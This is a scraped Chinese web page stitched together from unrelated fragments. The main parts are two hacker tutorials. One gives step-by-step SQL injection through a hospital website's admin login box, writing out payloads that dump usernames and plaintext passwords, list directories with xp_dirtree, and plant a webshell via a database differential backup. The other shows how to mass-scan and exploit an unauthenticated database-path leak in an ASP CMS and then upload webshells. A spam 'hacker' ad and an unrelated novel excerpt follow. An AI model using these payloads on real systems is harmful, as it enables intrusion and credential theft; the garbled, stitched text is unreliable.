有shell怎么入侵网站拿后台?

后台登入框注入拿shell步骤
发布者: moke |
打开网站(网址就不发了,只讲过程),是一个医院的站点,看了下网站程序,是asp的,嘻嘻,asp的站日的比较多,对它有点亲切感,随便点了一个新闻链接,加上一个单引号,弹出了一个对话框看来有点防范啊,为了确定是否是防注入系统,如果是的话,我们就可以试试cookie注入了,于是,我换个方法检测了下,就是/kssz.asp?BcgID=104&ThatBcgID=65&MainBcgID=102-0在数字后加上减0,回车,弹出相同的提示对话框,分别提交/kssz.asp?BcgID=104&ThatBcgID=65-0&MainBcgID=102/kssz.asp?BcgID=104-0&ThatBcgID=65&MainBcgID=102都是相同的提示,看来是程序过滤了,非防注入。然后我就打开Google,搜索了下带有asp?id=的链接,结果都是一样,那注入就没戏了。接下来,俺就拿出自己写的扫描工具扫描了下常见上传点,也没有发现,看来,只能向后台输入框进军了哈。在后台输入一个单引号,随便输入密码,回车,报错了,哈看来朋友说的没错,有戏啊,而且是mssql的,幸亏是mssql的,不然还拿不下呢(原因,后面会提到)接着,按照常规步骤,开始注入了,但是俺是懒人,想偷点懒,于是抓包,想通过get方式来注入,这样可以让工具来代替人力啊,哈哈,于是,组合下内容/login/default.asp?Submit=%B5%C7+%C2%BC&Userpwd=1& Username=1可是老天就是不配合俺,这个方法在这里不行啊。哎,看来只能手工了,这个对俺来说相当痛苦了。米办法,老实的一步一步来了。在输入框里输入’ having 1=1 and ‘’=’ 回车,报错嘻嘻,我得意的笑,这里,我们得到了表名和字段名,继续爆,输入’group by user_info.user_id having 1=1 and ‘’=’爆出了user_name,继续爆,’group by user_info.user_id ,user_info.user_name having 1=1 and ‘’=’到这里就差不多了,我们要的关键字段都有了,表名也有了,该是爆内容了,输入’and 1=(select user_name from user_info) and ‘’=’ 爆出了用户名然后用相同方法,输入’and 1=(select user_pwd from user_info) and ‘’=’ 爆出了密码,哈哈发现密码还是不加密的,那就更好了。直接拿起密码进入后台以为接下来就容易拿到shell了,随便找了一个上传点,试了下直接传,提示成功,哈哈,开心了,心道,今天rp不错的嘛,刚刚在手工那里费了点时间,现在刚刚补回来了,直接拿到shell了,于是拿着地址去打开,结果,当场吐血,为啥,因为上传路径的文件夹不让执行脚本啊心里大骂这个管理员,shit,shit,shit他JJ,让老子白高兴一场。找了下其他图片的文件夹路径,都是一样,不让执行脚本。哎,苍天那,大地啊,你怎么可以这样对我啊。以为没办法那shell了,准备放弃了,和朋友一说,他说,是不是可以在后台进行差异备份拿shell呢,我一听,一拍大腿,对啊,MMB,我怎么没想到,哎,居然把后台的注入点是mssql这茬给忘了,鄙视下自己。要差异备份首先要知道站点,哎,俺最头痛的手工又要开始了,话说到这里,插一句话,希望各位一定要好好学习sql哦,工具是死的,人是活的,手工厉害啊,虽然麻烦(观众:又开始装逼了,小心出门被雷劈啊…..我:哈哈,俺不怕,俺是绝缘体,没事没事…..忽然,天空一阵巨响,小影子被雷劈了。。。,今天没看黄历啊)开始猜路径了,过程是:建立一个表,通过xp_dirtree组件,把列出来的内容插入临时表,然后我们在一个一个把内容从临时表里读出来。首先,我们建立一个表,输入’ create talbe tmp(id int identity(1,1),path varchar(255),depth int,isfile int ) and ‘’=’然后,我们要确认下我们的表是否建立成功了,不然如果不成功的话,我们后面做的都是无用功了,哈。输入’ select * from tmp having 1=1 and ‘’=’,报错了,说明建表成功接下来,就是插入内容了‘insert into tmp exec master.dbo.xp_dirtree ‘d:’,1,1 and ‘’=’ 接着,就可以列目录了,输入‘ and 1=(select path from tmp where id=N) and ‘’=’ (N=1,2,3,4,5,……)就列出了路径改变N的值就可以列出了,重复过程就不写了,最后知道路径是接下来就是进行差异备份了,在输入框输入一次输入差异备份语句'alter database hz3yy set RECOVERY FULL--'Drop table [banlg];create table [dbo].[banlg] ([cmd] [image])--'declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x backup log @a to
with init--'insert into banlg(cmd) values(0x3C636DE)--'declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C655C687AF6D5C772E617370 backup log @a to --'Drop table [banlg]—然后输入网址,输入/ww.asp,熟悉的乱码界面出现了,哈哈,然后就是传shell了,图就不截了,嘻嘻。
魔客吧温馨提示:如果你想搭建一个地方门户或者社交论坛,那么到魔客吧的
频道看看吧,这里有很多的地方门户和论坛模板哦!
本文地址:
文章标题:
最新分享资源
0102030405060708上传时间:
56官方微信
扫一扫发现精彩新闻热线:3
下载手机生活帮
便民微信二维码
您的位置: &
& 入侵网站后台方法是什么
我来帮他解答
您需要登录后才可以回帖
短信快捷登录
合作账号登录
验证即登录,未注册将自动创建万家账号
发送验证码
提示:您的回答需要编辑审核后才能显示
相关问题:
填写追问描述:
今日万家热线
扫描关注今日万家热线微信公共号一,简述漏洞首先简单介绍一下sitedynamic企业网站管理系统,一套系统采用了asp设计,使用框架设计模式,页面高速缓存,是迄今为止国内比较先进的asp语言企业网站管理系统,网站的后台功能很强大,管理简捷,支持模版机制。全站可生成各类模拟静态,使用页面高速缓存,站点访问速度很快。以上这些就是网上的一些介绍,不过说实在的,我以前从未听说过这个管理系统,好了,直接切入系统,分析源码可知,amin/database/index.asp文件没有判断是否已登录,就直接把数据库的地址给显示出来了。二,漏洞利用既然知道他这个文件存在漏洞,那我们就开始批量寻找使用这种网站管理系统的网站,直接清除大名鼎鼎的网站猎手3.0,获取网址之后,我们整理一下网址,把仅留根目录勾选上,再点击整理网址即可,然后我们选择扫描漏洞文件一栏,再点击下方的加油地址,随后在漏洞文件一栏中插入amin/database/index.asp,我们在最下方选上刚才添加的文件,最后点击开始扫描,稍等一会儿,我们就得到了存在此漏洞的网站地址了。我们在检测结果中,随便打开一个网址,选择数据库压缩,已经看到了网站的数据库路径了,接下来自然就是下载他的数据库了,下载后的数据库使用明小子打开,选择db_system这个字段,就会得到管理员的账号和密码。密码是经过十六位md5加密的,破解后发现密码很简单。我先浏览一下他的网站,看样子不是新建的用来测试的网站,像是一个企业网站,国内的企业网站安全意识果然够差。三,进入后台拿,shell下面自然就是登录进入后台拿wdbshell了,这个网站的后台地址也是默认的,登录后浏览一下后台,似乎使用上传,然后备份数据库的方法不行,难道就没有别的方法来得到了吗?我来告诉大家一个方法,在地址后面添加finder/default.asp,然后新建一个a.asp文件夹,接着在管理工具系统设置中更改下上传地址,接着返回,相山区png格式的小马,直接访问小马的地址,最后上传大马就可以了。【黑客】最近比较流行的入侵网站拿shell教程+入侵网站/获取网站平台数据/最高权限获取
【黑客】最近比较流行的入侵网站拿shell教程+入侵网站/获取网站平台数据/最高权限获取
虫子讲段子
【黑客】最近比较流行的入侵网站拿shell教程+入侵网站/获取网站平台数据/最高权限获取微【——▼▲137—电—9813—话—0099▼▲——】信【——▼▲a7—微—78—信—az▼▲——】起眼。
看着那空旷的灵田,林暮于心不忍,这些可都是三品灵田,眼睁睁地看着它们在那里荒芜,对他来说,是一种折磨。
林暮现在只希望寒烟草和星空蓝快快成熟,那时,他就可以拥有许多种子,用来种植在那荒芜的地方。
不过,林暮也有些得意。在三品灵田里种植二品灵草,恐怕门派也没有这么大手笔。
他相信,这些二品灵草的品质一定远超一般二品灵草。
这句话只是自我安慰。林暮看着那荒芜的三品灵田,觉得一阵刺眼,自己太暴殄天物了。
林暮决定再去药园偷些种子,来填补他内心的空白,这个灵田一定不能荒废。
拿着张若虚给的玉佩,林暮轻车熟路,顺畅无阻地来到暖云谷中。
本文仅代表作者观点,不代表百度立场。系作者授权百家号发表,未经许可不得转载。
虫子讲段子
百家号 最近更新:
简介: 在这里发布好的段子让大家开心
作者最新文章}

我要回帖

更多关于 拿网站webshell 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信